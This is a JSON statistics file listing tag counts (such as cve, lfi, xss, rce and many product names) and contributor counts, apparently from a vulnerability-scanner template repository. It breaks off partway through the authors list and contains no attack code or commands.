-{"tags":[{"name":"cve","count":803},{"name":"lfi","count":325},{"name":"xss","count":253},{"name":"panel","count":252},{"name":"wordpress","count":241},{"name":"exposure","count":233},{"name":"rce","count":200},{"name":"tech","count":190},{"name":"wp-plugin","count":167},{"name":"cve2020","count":164},{"name":"cve2021","count":139},{"name":"joomla","count":128},{"name":"cve2010","count":108},{"name":"cve2019","count":96},{"name":"config","count":94},{"name":"cve2018","count":86},{"name":"apache","count":70},{"name":"takeover","count":68},{"name":"iot","count":66},{"name":"token","count":65},{"name":"default-login","count":64},{"name":"oob","count":57},{"name":"cve2017","count":50},{"name":"unauth","count":47},{"name":"file","count":46},{"name":"network","count":43},{"name":"ssrf","count":40},{"name":"sqli","count":38},{"name":"","count":37},{"name":"cve2016","count":36},{"name":"oracle","count":36},{"name":"redirect","count":34},{"name":"logs","count":30},{"name":"jira","count":28},{"name":"listing","count":27},{"name":"cve2014","count":27},{"name":"atlassian","count":27},{"name":"cve2015","count":26},{"name":"misc","count":23},{"name":"auth-bypass","count":23},{"name":"generic","count":23},{"name":"disclosure","count":22},{"name":"router","count":20},{"name":"cisco","count":19},{"name":"aem","count":19},{"name":"sap","count":18},{"name":"debug","count":18},{"name":"misconfig","count":18},{"name":"springboot","count":18},{"name":"cve2012","count":17},{"name":"php","count":16},{"name":"cve2011","count":15},{"name":"fuzz","count":14},{"name":"cve2009","count":14},{"name":"login","count":14},{"name":"weblogic","count":14},{"name":"struts","count":14},{"name":"adobe","count":13},{"name":"zoho","count":13},{"name":"devops","count":13},{"name":"android","count":13},{"name":"dns","count":13},{"name":"aws","count":12},{"name":"jenkins","count":12},{"name":"dlink","count":12},{"name":"manageengine","count":12},{"name":"wp-theme","count":11},{"name":"cve2013","count":11},{"name":"dell","count":10},{"name":"xxe","count":10},{"name":"vmware","count":9},{"name":"magento","count":9},{"name":"ftp","count":9},{"name":"intrusive","count":9},{"name":"scada","count":8},{"name":"nginx","count":8},{"name":"cve2008","count":8},{"name":"ruijie","count":8},{"name":"cnvd","count":8},{"name":"rails","count":8},{"name":"airflow","count":8},{"name":"gitlab","count":8},{"name":"cms","count":7},{"name":"ibm","count":7},{"name":"files","count":7},{"name":"google","count":7},{"name":"confluence","count":7},{"name":"netgear","count":7},{"name":"backup","count":7},{"name":"coldfusion","count":7},{"name":"kubernetes","count":7},{"name":"microsoft","count":7},{"name":"rconfig","count":6},{"name":"solr","count":6},{"name":"api","count":6},{"name":"django","count":6},{"name":"docker","count":6},{"name":"hp","count":6},{"name":"camera","count":6},{"name":"jetty","count":6},{"name":"citrix","count":6},{"name":"laravel","count":6},{"name":"drupal","count":5},{"name":"iis","count":5},{"name":"nodejs","count":5},{"name":"tomcat","count":5},{"name":"java","count":5},{"name":"fileupload","count":5},{"name":"jolokia","count":5},{"name":"circarlife","count":5},{"name":"windows","count":5},{"name":"dedecms","count":5},{"name":"deserialization","count":5},{"name":"phpmyadmin","count":5},{"name":"ssti","count":5},{"name":"headless","count":5},{"name":"lucee","count":5},{"name":"printer","count":5},{"name":"symantec","count":4},{"name":"artifactory","count":4},{"name":"proxy","count":4},{"name":"crlf","count":4},{"name":"strapi","count":4},{"name":"zabbix","count":4},{"name":"firmware","count":4},{"name":"rfi","count":4},{"name":"samsung","count":4},{"name":"resin","count":4},{"name":"wso2","count":4},{"name":"magmi","count":4},{"name":"git","count":4},{"name":"buffalo","count":4},{"name":"traversal","count":4},{"name":"solarwinds","count":4},{"name":"hongdian","count":4},{"name":"glpi","count":4},{"name":"vpn","count":4},{"name":"exchange","count":4},{"name":"symfony","count":4},{"name":"moodle","count":4},{"name":"thinkphp","count":4},{"name":"fatpipe","count":4},{"name":"elastic","count":4},{"name":"zimbra","count":4},{"name":"thinkcmf","count":4},{"name":"asp","count":4},{"name":"webserver","count":4},{"name":"grafana","count":4},{"name":"injection","count":3},{"name":"backups","count":3},{"name":"nacos","count":3},{"name":"firebase","count":3},{"name":"cacti","count":3},{"name":"openam","count":3},{"name":"jeesns","count":3},{"name":"openssh","count":3},{"name":"smtp","count":3},{"name":"opensis","count":3},{"name":"amazon","count":3},{"name":"itop","count":3},{"name":"fpd","count":3},{"name":"tikiwiki","count":3},{"name":"linkerd","count":3},{"name":"kibana","count":3},{"name":"mail","count":3},{"name":"lfr","count":3},{"name":"log","count":3},{"name":"mongodb","count":3},{"name":"nexus","count":3},{"name":"targa","count":3},{"name":"r-seenet","count":3},{"name":"druid","count":3},{"name":"microstrategy","count":3},{"name":"jellyfin","count":3},{"name":"ssh","count":3},{"name":"hoteldruid","count":3},{"name":"cve2007","count":3},{"name":"kafka","count":3},{"name":"npm","count":3},{"name":"prometheus","count":3},{"name":"httpd","count":3},{"name":"fanruan","count":3},{"name":"azure","count":3},{"name":"slack","count":3},{"name":"zhiyuan","count":3},{"name":"bitrix","count":3},{"name":"caucho","count":3},{"name":"backdoor","count":3},{"name":"oa","count":3},{"name":"nosqli","count":3},{"name":"ebs","count":3},{"name":"vbulletin","count":3},{"name":"ofbiz","count":3},{"name":"bigip","count":3},{"name":"kevinlab","count":3},{"name":"telerik","count":3},{"name":"terramaster","count":3},{"name":"springcloud","count":3},{"name":"showdoc","count":2},{"name":"splunk","count":2},{"name":"aruba","count":2},{"name":"harbor","count":2},{"name":"node","count":2},{"name":"chyrp","count":2},{"name":"odoo","count":2},{"name":"totemomail","count":2},{"name":"ecoa","count":2},{"name":"glassfish","count":2},{"name":"axis","count":2},{"name":"enumeration","count":2},{"name":"saltstack","count":2},{"name":"chiyu","count":2},{"name":"frp","count":2},{"name":"avantfax","count":2},{"name":"guacamole","count":2},{"name":"geowebserver","count":2},{"name":"nextjs","count":2},{"name":"paloalto","count":2},{"name":"waf","count":2},{"name":"igs","count":2},{"name":"pega","count":2},{"name":"sonarqube","count":2},{"name":"status","count":2},{"name":"sonicwall","count":2},{"name":"yapi","count":2},{"name":"ucmdb","count":2},{"name":"cve2005","count":2},{"name":"kentico","count":2},{"name":"payara","count":2},{"name":"bypass","count":2},{"name":"wordfence","count":2},{"name":"service","count":2},{"name":"idrac","count":2},{"name":"activemq","count":2},{"name":"fortios","count":2},{"name":"icewarp","count":2},{"name":"maian","count":2},{"name":"liferay","count":2},{"name":"minio","count":2},{"name":"openvpn","count":2},{"name":"spark","count":2},{"name":"bucket","count":2},{"name":"vrealize","count":2},{"name":"trixbox","count":2},{"name":"storage","count":2},{"name":"dos","count":2},{"name":"globalprotect","count":2},{"name":"dolibarr","count":2},{"name":"hostheader-injection","count":2},{"name":"keycloak","count":2},{"name":"sharepoint","count":2},{"name":"nagios","count":2},{"name":"ec2","count":2},{"name":"shellshock","count":2},{"name":"jsf","count":2},{"name":"jeedom","count":2},{"name":"linux","count":2},{"name":"hpe","count":2},{"name":"mcafee","count":2},{"name":"commax","count":2},{"name":"yii","count":2},{"name":"db","count":2},{"name":"phpcollab","count":2},{"name":"netsweeper","count":2},{"name":"netis","count":2},{"name":"rstudio","count":2},{"name":"flir","count":2},{"name":"seeyon","count":2},{"name":"middleware","count":2},{"name":"qcubed","count":2},{"name":"openfire","count":2},{"name":"wuzhicms","count":2},{"name":"couchdb","count":2},{"name":"ecology","count":2},{"name":"xxljob","count":2},{"name":"kong","count":2},{"name":"prestashop","count":2},{"name":"ilo","count":2},{"name":"nextcloud","count":2},{"name":"mida","count":2},{"name":"sitecore","count":2},{"name":"github","count":2},{"name":"hjtcloud","count":2},{"name":"oauth","count":2},{"name":"vcenter","count":2},{"name":"leak","count":2},{"name":"adminer","count":2},{"name":"bruteforce","count":2},{"name":"chamilo","count":2},{"name":"grav","count":2},{"name":"natshell","count":2},{"name":"axis2","count":2},{"name":"rockmongo","count":2},{"name":"huawei","count":2},{"name":"hashicorp","count":2},{"name":"prtg","count":2},{"name":"voipmonitor","count":2},{"name":"emerge","count":2},{"name":"akkadian","count":2},{"name":"getsimple","count":2},{"name":"horde","count":2},{"name":"akamai","count":2},{"name":"favicon","count":2},{"name":"plesk","count":2},{"name":"cache","count":2},{"name":"tidb","count":2},{"name":"jboss","count":2},{"name":"smb","count":2},{"name":"hasura","count":2},{"name":"webcam","count":2},{"name":"aviatrix","count":2},{"name":"wmt","count":1},{"name":"bookstack","count":1},{"name":"weiphp","count":1},{"name":"oneblog","count":1},{"name":"octoprint","count":1},{"name":"graphite","count":1},{"name":"nps","count":1},{"name":"krweb","count":1},{"name":"oidc","count":1},{"name":"blind","count":1},{"name":"zcms","count":1},{"name":"acontent","count":1},{"name":"zeroshell","count":1},{"name":"codemeter","count":1},{"name":"owa","count":1},{"name":"uwsgi","count":1},{"name":"elascticsearch","count":1},{"name":"subrion","count":1},{"name":"dotnetnuke","count":1},{"name":"wifisky","count":1},{"name":"gitea","count":1},{"name":"pcoip","count":1},{"name":"duomicms","count":1},{"name":"simplecrm","count":1},{"name":"gloo","count":1},{"name":" default-login","count":1},{"name":"ulterius","count":1},{"name":"nimble","count":1},{"name":"auth","count":1},{"name":"etherpad","count":1},{"name":"fortinet","count":1},{"name":"spf","count":1},{"name":"geddy","count":1},{"name":"database","count":1},{"name":"chinaunicom","count":1},{"name":"lotus","count":1},{"name":"whm","count":1},{"name":"eprints","count":1},{"name":"pmb","count":1},{"name":"csrf","count":1},{"name":"omi","count":1},{"name":"bigbluebutton","count":1},{"name":"camunda","count":1},{"name":"frontpage","count":1},{"name":"magicflow","count":1},{"name":"rmi","count":1},{"name":"webadmin","count":1},{"name":"karel","count":1},{"name":"cse","count":1},{"name":"tamronos","count":1},{"name":"metinfo","count":1},{"name":"mailchimp","count":1},{"name":"keenetic","count":1},{"name":"plugin","count":1},{"name":"rocketchat","count":1},{"name":"lutron","count":1},{"name":"cve2006","count":1},{"name":"pagespeed","count":1},{"name":"linksys","count":1},{"name":"centreon","count":1},{"name":"trilithic","count":1},{"name":"ilo4","count":1},{"name":"influxdb","count":1},{"name":"bazarr","count":1},{"name":"fiori","count":1},{"name":"tenda","count":1},{"name":"mariadb","count":1},{"name":"memcached","count":1},{"name":"lg-nas","count":1},{"name":"htmli","count":1},{"name":"gitlist","count":1},{"name":"clave","count":1},{"name":"sentry","count":1},{"name":"olivetti","count":1},{"name":"lancom","count":1},{"name":"sophos","count":1},{"name":"lotuscms","count":1},{"name":"glances","count":1},{"name":"openrestry","count":1},{"name":"javascript","count":1},{"name":"webftp","count":1},{"name":"moin","count":1},{"name":"testrail","count":1},{"name":"b2evolution","count":1},{"name":"spectracom","count":1},{"name":"owasp","count":1},{"name":"ognl","count":1},{"name":"phpfastcache","count":1},{"name":"linkedin","count":1},{"name":"ueditor","count":1},{"name":"hadoop","count":1},{"name":"eyou","count":1},{"name":"imap","count":1},{"name":"tcexam","count":1},{"name":"pacsone","count":1},{"name":"azkaban","count":1},{"name":"webui","count":1},{"name":"miscrsoft","count":1},{"name":"ioncube","count":1},{"name":"grails","count":1},{"name":"oscommerce","count":1},{"name":"stem","count":1},{"name":"tensorflow","count":1},{"name":"fastcgi","count":1},{"name":"apiman","count":1},{"name":"circontrol","count":1},{"name":"nuxeo","count":1},{"name":"rubedo","count":1},{"name":"apos","count":1},{"name":"jenkin","count":1},{"name":"default","count":1},{"name":"mobileiron","count":1},{"name":"kerbynet","count":1},{"name":"powercreator","count":1},{"name":"kubeflow","count":1},{"name":"discourse","count":1},{"name":"processmaker","count":1},{"name":"bedita","count":1},{"name":"opentsdb","count":1},{"name":"spring","count":1},{"name":"checkpoint","count":1},{"name":"node-red-dashboard","count":1},{"name":"tjws","count":1},{"name":"myvuehelp","count":1},{"name":"bolt","count":1},{"name":"upload","count":1},{"name":"vidyo","count":1},{"name":"zms","count":1},{"name":"daybyday","count":1},{"name":"maxsite","count":1},{"name":"szhe","count":1},{"name":"kindeditor","count":1},{"name":"gateone","count":1},{"name":"fortiweb","count":1},{"name":"kafdrop","count":1},{"name":"ricoh","count":1},{"name":"wamp","count":1},{"name":"gotmls","count":1},{"name":"calendarix","count":1},{"name":"skywalking","count":1},{"name":"elfinder","count":1},{"name":"cloudflare","count":1},{"name":"vnc","count":1},{"name":"dotclear","count":1},{"name":"cherokee","count":1},{"name":"resourcespace","count":1},{"name":"mongo","count":1},{"name":"huijietong","count":1},{"name":"sprintful","count":1},{"name":"panos","count":1},{"name":"plc","count":1},{"name":"extractor","count":1},{"name":"rabbitmq","count":1},{"name":"kyan","count":1},{"name":"erp-nc","count":1},{"name":"nordex","count":1},{"name":"monitorr","count":1},{"name":"office365","count":1},{"name":"rhymix","count":1},{"name":"postgres","count":1},{"name":"zookeeper","count":1},{"name":"k8","count":1},{"name":"codeigniter","count":1},{"name":"realteo","count":1},{"name":"javafaces","count":1},{"name":"redcap","count":1},{"name":"cockpit","count":1},{"name":"saltapi","count":1},{"name":"mirai","count":1},{"name":"springframework","count":1},{"name":"bitly","count":1},{"name":"sourcebans","count":1},{"name":"majordomo2","count":1},{"name":"empirecms","count":1},{"name":"glowroot","count":1},{"name":"craftcms","count":1},{"name":"ems","count":1},{"name":"wildfly","count":1},{"name":"etouch","count":1},{"name":"hiawatha","count":1},{"name":"exacqvision","count":1},{"name":"servicedesk","count":1},{"name":"soar","count":1},{"name":"visionhub","count":1},{"name":"appweb","count":1},{"name":"traefik","count":1},{"name":"darkstat","count":1},{"name":"werkzeug","count":1},{"name":"ns","count":1},{"name":"logontracer","count":1},{"name":"timesheet","count":1},{"name":"sqlite","count":1},{"name":"openemr","count":1},{"name":"pyramid","count":1},{"name":"rujjie","count":1},{"name":"lansweeper","count":1},{"name":"sangfor","count":1},{"name":"commscope","count":1},{"name":"ssltls","count":1},{"name":"perl","count":1},{"name":"accela","count":1},{"name":"avtech","count":1},{"name":"jmx","count":1},{"name":"rsyncd","count":1},{"name":"bullwark","count":1},{"name":"cors","count":1},{"name":"dnssec","count":1},{"name":"trane","count":1},{"name":"thinkadmin","count":1},{"name":"embedthis","count":1},{"name":"avalanche","count":1},{"name":"mantisbt","count":1},{"name":"viewlinc","count":1},{"name":"landray","count":1},{"name":"listserv","count":1},{"name":"vscode","count":1},{"name":"cgi","count":1},{"name":"postmessage","count":1},{"name":"visualtools","count":1},{"name":"h3c-imc","count":1},{"name":"csod","count":1},{"name":"jitsi","count":1},{"name":"cocoon","count":1},{"name":"maccmsv10","count":1},{"name":"zyxel","count":1},{"name":"fortigates","count":1},{"name":"svnserve","count":1},{"name":"jquery","count":1},{"name":"sco","count":1},{"name":"livezilla","count":1},{"name":"dvwa","count":1},{"name":"mysql","count":1},{"name":"meraki","count":1},{"name":"acme","count":1},{"name":"tpshop","count":1},{"name":"hiboss","count":1},{"name":"phpwiki","count":1},{"name":"jnoj","count":1},{"name":"smartsense","count":1},{"name":"artica","count":1},{"name":"beanstalk","count":1},{"name":"pgadmin","count":1},{"name":"xmlchart","count":1},{"name":"jenzabar","count":1},{"name":"ghost","count":1},{"name":"openerp","count":1},{"name":"terraform","count":1},{"name":"jeewms","count":1},{"name":"clusterengine","count":1},{"name":"synnefo","count":1},{"name":"nweb2fax","count":1},{"name":"clink-office","count":1},{"name":"vsphere","count":1},{"name":"expressjs","count":1},{"name":"couchbase","count":1},{"name":"beanshell","count":1},{"name":"xiuno","count":1},{"name":"shopxo","count":1},{"name":"gunicorn","count":1},{"name":"actuator","count":1},{"name":"gsoap","count":1},{"name":"shoretel","count":1},{"name":"concrete","count":1},{"name":"ecom","count":1},{"name":"cloudinary","count":1},{"name":"vsftpd","count":1},{"name":"salesforce","count":1},{"name":"selea","count":1},{"name":"sql","count":1},{"name":"primetek","count":1},{"name":"wavlink","count":1},{"name":"redwood","count":1},{"name":"tensorboard","count":1},{"name":"faraday","count":1},{"name":"scs","count":1},{"name":"shiro","count":1},{"name":"burp","count":1},{"name":"sage","count":1},{"name":"twitter-server","count":1},{"name":"cerebro","count":1},{"name":"mantis","count":1},{"name":"emby","count":1},{"name":"fortilogger","count":1},{"name":"goahead","count":1},{"name":"mongoshake","count":1},{"name":"fortigate","count":1},{"name":"panabit","count":1},{"name":"portainer","count":1},{"name":"graphql","count":1},{"name":"redhat","count":1},{"name":"tieline","count":1},{"name":"dom","count":1},{"name":"timeclock","count":1},{"name":"drone","count":1},{"name":"finereport","count":1},{"name":"mpsec","count":1},{"name":"esmtp","count":1},{"name":"doh","count":1},{"name":"opm","count":1},{"name":"rmc","count":1},{"name":"alerta","count":1},{"name":"tracer","count":1},{"name":"jsp","count":1},{"name":"moinmoin","count":1},{"name":"spidercontrol","count":1},{"name":"wooyun","count":1},{"name":"nsasg","count":1},{"name":"heroku","count":1},{"name":"tika","count":1},{"name":"mediumish","count":1},{"name":"clockwatch","count":1},{"name":"proftpd","count":1},{"name":"plastic","count":1},{"name":"zarafa","count":1},{"name":"idemia","count":1},{"name":"zmanda","count":1},{"name":"addpac","count":1},{"name":"exposures","count":1},{"name":"pippoint","count":1},{"name":"acexy","count":1},{"name":"iceflow","count":1},{"name":"circontrorl","count":1},{"name":"tileserver","count":1},{"name":"seacms","count":1},{"name":"xunchi","count":1},{"name":"jfrog","count":1},{"name":"ruby","count":1},{"name":"nedi","count":1},{"name":"myucms","count":1},{"name":"starttls","count":1},{"name":"exponentcms","count":1},{"name":"k8s","count":1},{"name":"setup","count":1},{"name":"tectuus","count":1},{"name":"episerver","count":1},{"name":"asus","count":1},{"name":"fuelcms","count":1},{"name":"zzzcms","count":1},{"name":"tapestry","count":1},{"name":"eyelock","count":1},{"name":"comodo","count":1},{"name":"shopizer","count":1},{"name":"basic-auth","count":1},{"name":"wing-ftp","count":1},{"name":"websphere","count":1},{"name":"bash","count":1},{"name":"qvisdvr","count":1},{"name":"openx","count":1},{"name":"javamelody","count":1},{"name":"cyberoam","count":1},{"name":"hortonworks","count":1},{"name":"solarlog","count":1},{"name":"shopware","count":1},{"name":"aspnuke","count":1},{"name":"announcekit","count":1},{"name":"graylog","count":1},{"name":"razor","count":1},{"name":"netgenie","count":1},{"name":"pulsesecure","count":1},{"name":"ssl","count":1},{"name":"nc2","count":1},{"name":"alertmanager","count":1},{"name":"swagger","count":1},{"name":"robomongo","count":1},{"name":"sidekiq","count":1},{"name":"biometrics","count":1},{"name":"zm","count":1},{"name":"dotnet","count":1},{"name":"crm","count":1},{"name":"nomad","count":1},{"name":"anchorcms","count":1},{"name":"lighttpd","count":1},{"name":"ruckus","count":1},{"name":"ntopng","count":1},{"name":"shoppable","count":1},{"name":"gilacms","count":1},{"name":"plone","count":1},{"name":"jaspersoft","count":1},{"name":"webmodule-ee","count":1},{"name":"74cms","count":1},{"name":"nette","count":1},{"name":"iptime","count":1},{"name":"expose","count":1},{"name":"elasticsearch","count":1},{"name":"cloudron","count":1},{"name":"pihole","count":1},{"name":"redis","count":1},{"name":"clickhouse","count":1},{"name":"haproxy","count":1},{"name":"xvr","count":1},{"name":"mrtg","count":1},{"name":"gstorage","count":1},{"name":"gurock","count":1},{"name":"sceditor","count":1},{"name":"email","count":1},{"name":"upnp","count":1},{"name":"svn","count":1},{"name":"aura","count":1},{"name":"nexusdb","count":1},{"name":"viewpoint","count":1},{"name":"chevereto","count":1},{"name":"clockwork","count":1},{"name":"gridx","count":1},{"name":"fedora","count":1},{"name":"woocomernce","count":1},{"name":"parentlink","count":1},{"name":"ganglia","count":1},{"name":"qdpm","count":1},{"name":"centos","count":1},{"name":"s3","count":1},{"name":"gespage","count":1},{"name":"fastapi","count":1},{"name":"qsan","count":1},{"name":"ambari","count":1},{"name":"domxss","count":1},{"name":"okta","count":1},{"name":"blackboard","count":1},{"name":"opensns","count":1},{"name":"klog","count":1},{"name":"zte","count":1},{"name":"alibaba","count":1},{"name":"netrc","count":1},{"name":"panasonic","count":1},{"name":"mdb","count":1},{"name":"servicenow","count":1},{"name":"yealink","count":1},{"name":"netmask","count":1},{"name":"openstack","count":1},{"name":"tongda","count":1},{"name":"st","count":1},{"name":"blue-ocean","count":1},{"name":"natemail","count":1},{"name":"adb","count":1},{"name":"gogs","count":1},{"name":"yzmcms","count":1},{"name":"landrayoa","count":1},{"name":"phpfusion","count":1},{"name":"wondercms","count":1},{"name":"interlib","count":1},{"name":"mautic","count":1},{"name":"xml","count":1},{"name":"turbocrm","count":1},{"name":"eg","count":1},{"name":"triconsole","count":1},{"name":"yachtcontrol","count":1},{"name":"spip","count":1},{"name":"smi","count":1},{"name":"api-manager","count":1},{"name":"octobercms","count":1},{"name":"rdp","count":1},{"name":"cobub","count":1},{"name":"dompdf","count":1},{"name":"arl","count":1},{"name":"scimono","count":1},{"name":"feifeicms","count":1},{"name":"mara","count":1},{"name":"labtech","count":1},{"name":"diris","count":1},{"name":"zenario","count":1},{"name":"socomec","count":1},{"name":"websvn","count":1},{"name":"phpshowtime","count":1},{"name":"optiLink","count":1},{"name":"metabase","count":1},{"name":"flink","count":1},{"name":"monitorix","count":1},{"name":"motorola","count":1},{"name":"wavemaker","count":1},{"name":"phpinfo","count":1},{"name":"wiki","count":1},{"name":"phalcon","count":1},{"name":"dvr","count":1},{"name":"webmin","count":1},{"name":"cofax","count":1},{"name":"smartblog","count":1},{"name":"dbeaver","count":1},{"name":"woocommerce","count":1},{"name":"opencast","count":1},{"name":"nifi","count":1},{"name":"rockethchat","count":1},{"name":"argussurveillance","count":1},{"name":"floc","count":1},{"name":"netdata","count":1},{"name":"minimouse","count":1},{"name":"sureline","count":1},{"name":"luftguitar","count":1},{"name":"sar2html","count":1},{"name":"nuuo","count":1},{"name":"emc","count":1},{"name":"redmine","count":1},{"name":"varnish","count":1},{"name":"wazuh","count":1},{"name":"froxlor","count":1},{"name":"zend","count":1},{"name":"novnc","count":1},{"name":"xampp","count":1},{"name":"opensmtpd","count":1},{"name":"solman","count":1},{"name":"sgp","count":1},{"name":"tor","count":1},{"name":"sarg","count":1},{"name":"cscart","count":1},{"name":"totaljs","count":1},{"name":"xdcms","count":1},{"name":"discord","count":1},{"name":"expn","count":1},{"name":"achecker","count":1},{"name":"geutebruck","count":1},{"name":"lanproxy","count":1},{"name":"phpunit","count":1},{"name":"ewebs","count":1}],"authors":[{"name":"daffainfo","count":280},{"name":"pikpikcu","count":277},{"name":"dhiyaneshdk","count":268},{"name":"pdteam","count":199},{"name":"geeknik","count":154},{"name":"dwisiswant0","count":131},{"name":"gy741","count":77},{"name":"pussycat0x","count":70},{"name":"princechaddha","count":63},{"name":"madrobot","count":61},{"name":"0x_akoko","count":43},{"name":"gaurang","count":42},{"name":"philippedelteil","count":27},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":14},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"righettod","count":10},{"name":"wdahlenb","count":10},{"name":"random_robbie","count":10},{"name":"melbadry9","count":9},{"name":"hackergautam","count":9},{"name":"nadino","count":9},{"name":"iamthefrogy","count":8},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"emadshanab","count":7},{"name":"0x240x23elu","count":7},{"name":"dogasantos","count":7},{"name":"kophjager007","count":7},{"name":"oppsec","count":7},{"name":"techryptic (@tech)","count":7},{"name":"dr_set","count":7},{"name":"harshbothra_","count":7},{"name":"meme-lord","count":7},{"name":"randomstr1ng","count":7},{"name":"puzzlepeaches","count":6},{"name":"pentest_swissky","count":6},{"name":"caspergn","count":6},{"name":"__fazal","count":6},{"name":"logicalhunter","count":6},{"name":"elsfa7110","count":5},{"name":"joanbono","count":5},{"name":"rootxharsh","count":5},{"name":"iamnoooob","count":5},{"name":"panch0r3d","count":5},{"name":"lu4nx","count":5},{"name":"yanyun","count":5},{"name":"ganofins","count":5},{"name":"xelkomy","count":4},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"nodauf","count":4},{"name":"z3bd","count":3},{"name":"f1tz","count":3},{"name":"incogbyte","count":3},{"name":"binaryfigments","count":3},{"name":"dudez","count":3},{"name":"vsh00t","count":3},{"name":"idealphase","count":3},{"name":"skeltavik","count":3},{"name":"fyoorer","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"_generic_human_","count":3},{"name":"emenalf","count":3},{"name":"jarijaas","count":3},{"name":"unstabl3","count":3},{"name":"shine","count":3},{"name":"johnk3r","count":3},{"name":"thomas_from_offensity","count":3},{"name":"tess","count":3},{"name":"sushantkamble","count":3},{"name":"0w4ys","count":3},{"name":"mavericknerd","count":3},{"name":"shifacyclewala","count":3},{"name":"impramodsargar","count":3},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"vavkamil","count":2},{"name":"kiblyn11","count":2},{"name":"r3naissance","count":2},{"name":"amsda","count":2},{"name":"0xsapra","count":2},{"name":"moritz nentwig","count":2},{"name":"gevakun","count":2},{"name":"ree4pwn","count":2},{"name":"joeldeleep","count":2},{"name":"fabaff","count":2},{"name":"cocxanh","count":2},{"name":"hetroublemakr","count":2},{"name":"0xprial","count":2},{"name":"ehsahil","count":2},{"name":"0xsmiley","count":2},{"name":"foulenzer","count":2},{"name":"mohammedsaneem","count":2},{"name":"davidmckennirey","count":2},{"name":"bp0lr","count":2},{"name":"nkxxkn","count":2},{"name":"manas_harsh","count":2},{"name":"johnjhacking","count":2},{"name":"dheerajmadhukar","count":2},{"name":"socketz","count":2},{"name":"hahwul","count":2},{"name":"zomsop82","count":2},{"name":"swissky","count":2},{"name":"0xcrypto","count":2},{"name":"0xrudra","count":2},{"name":"afaq","count":2},{"name":"randomrobbie","count":2},{"name":"huowuzhao","count":2},{"name":"alifathi-h1","count":2},{"name":"0xelkomy","count":2},{"name":"arcc","count":2},{"name":"gal nagli","count":2},{"name":"whoever","count":2},{"name":"parth","count":2},{"name":"pxmme1337","count":2},{"name":"random-robbie","count":2},{"name":"lotusdll","count":2},{"name":"bernardofsr","count":2},{"name":"x1m_martijn","count":2},{"name":"convisoappsec","count":2},{"name":"g4l1t0","count":2},{"name":"bing0o","count":2},{"name":"bsysop","count":2},{"name":"udit_thakkur","count":2},{"name":"w4cky_","count":2},{"name":"koti2","count":2},{"name":"defr0ggy","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"omarkurt","count":1},{"name":"@dwisiswant0","count":1},{"name":"jeya seelan","count":1},{"name":"ringo","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"sullo","count":1},{"name":"flag007","count":1},{"name":"ipanda","count":1},{"name":"rojanrijal","count":1},{"name":"elouhi","count":1},{"name":"ahmetpergamum","count":1},{"name":"ahmed sherif","count":1},{"name":"aresx","count":1},{"name":"ldionmarcil","count":1},{"name":"mah3sec_","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"ajaysenr","count":1},{"name":"thevillagehacker","count":1},{"name":"alph4byt3","count":1},{"name":"furkansenan","count":1},{"name":"c3l3si4n","count":1},{"name":"un-fmunozs","count":1},{"name":"akshansh","count":1},{"name":"borna nematzadeh","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"udyz","count":1},{"name":"kurohost","count":1},{"name":"s1r1u5_","count":1},{"name":"yashgoti","count":1},{"name":"cookiehanhoan","count":1},{"name":"iampritam","count":1},{"name":"retr0","count":1},{"name":"elder tao","count":1},{"name":"pudsec","count":1},{"name":"sy3omda","count":1},{"name":"naglinagli","count":1},{"name":"micha3lb3n","count":1},{"name":"exploitation","count":1},{"name":"dawid-czarnecki","count":1},{"name":"taielab","count":1},{"name":"oscarintherocks","count":1},{"name":"brabbit10","count":1},{"name":"akash.c","count":1},{"name":"co0nan","count":1},{"name":"alperenkesk","count":1},{"name":"soyelmago","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"fmunozs","count":1},{"name":"jteles","count":1},{"name":"luskabol","count":1},{"name":"elmahdi","count":1},{"name":"infosecsanyam","count":1},{"name":"j33n1k4","count":1},{"name":"yashanand155","count":1},{"name":"berkdusunur","count":1},{"name":"me9187","count":1},{"name":"schniggie","count":1},{"name":"nerrorsec","count":1},{"name":"toufik airane","count":1},{"name":"streetofhackerr007","count":1},{"name":"remonsec","count":1},{"name":"notsoevilweasel","count":1},{"name":"zhenwarx","count":1},{"name":"b0rn2r00t","count":1},{"name":"x6263","count":1},{"name":"qlkwej","count":1},{"name":"shifacyclewla","count":1},{"name":"mhdsamx","count":1},{"name":"philippdelteil","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"patralos","count":1},{"name":"whynotke","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"absshax","count":1},{"name":"apt-mirror","count":1},{"name":"alex","count":1},{"name":"adrianmf","count":1},{"name":"tirtha_mandal","count":1},{"name":"0xrod","count":1},{"name":"affix","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"_c0wb0y_","count":1},{"name":"shreyapohekar","count":1},{"name":"xstp","count":1},{"name":"ooooooo_q","count":1},{"name":"bad5ect0r","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"its0x08","count":1},{"name":"pratik khalane","count":1},{"name":"revblock","count":1},{"name":"kre80r","count":1},{"name":"0h1in9e","count":1},{"name":"andysvints","count":1},{"name":"bolli95","count":1},{"name":"hakluke","count":1},{"name":"becivells","count":1},{"name":"pdp","count":1},{"name":"vzamanillo","count":1},{"name":"blckraven","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"mass0ma","count":1},{"name":"_darrenmartyn","count":1},{"name":"andirrahmani1","count":1},{"name":"mubassirpatel","count":1},{"name":"knassar702","count":1},{"name":"kishore krishna 